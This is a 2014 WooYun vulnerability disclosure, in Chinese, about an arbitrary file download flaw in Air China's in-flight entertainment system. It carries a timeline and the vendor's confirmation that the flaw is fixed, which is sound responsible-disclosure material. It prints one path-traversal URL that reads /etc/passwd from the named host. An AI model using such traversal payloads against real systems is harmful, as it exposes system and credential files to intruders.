漏洞概要关注数(9)关注此漏洞

漏洞概要
关注数(
9
)
关注此漏洞
缺陷编号：
WooYun-2014-85836
漏洞标题：		中国国航某机上系统文件下载可能影响系统安全
相关厂商：
中国国际航空股份有限公司
漏洞作者：
tnt1200
提交时间：		2014-12-04 13:16
公开时间：		2015-03-04 13:18
漏洞类型：		任意文件遍历/下载
危害等级：		中
自评Rank：		10
漏洞状态：		
															厂商已经确认
漏洞来源：
http://www.wooyun.org
Tags标签：
任意文件读取
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-04：	细节已通知厂商并且等待厂商处理中
2014-12-05：	厂商已经确认，细节仅向厂商公开
2014-12-08：	细节向第三方安全合作伙伴开放
2015-03-04：	细节向公众公开
简要描述：
某通用机上娱乐系统任意下载
详细说明：
国航在飞行高空中提供WiFi服务，可以访问机上娱乐系统。
该系统存在文件下载漏洞，可任意下载配置文件，可能导致机上内网被渗透。
访问如下链接可下载任意文件：
http://ife.airchina.com/webapps/HAWAII/download.php?filename=../../../../../etc/passwd
漏洞证明：
存在漏洞的php文件：
passwd文件：
修复方案：
...
版权声明：转载请注明来源
tnt1200
@
乌云
漏洞回应
厂商回应：
危害等级：低
漏洞Rank：5
确认时间：2014-12-05 22:16
厂商回复：
感谢对国航信息安全的帮助！此漏洞已修复。
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分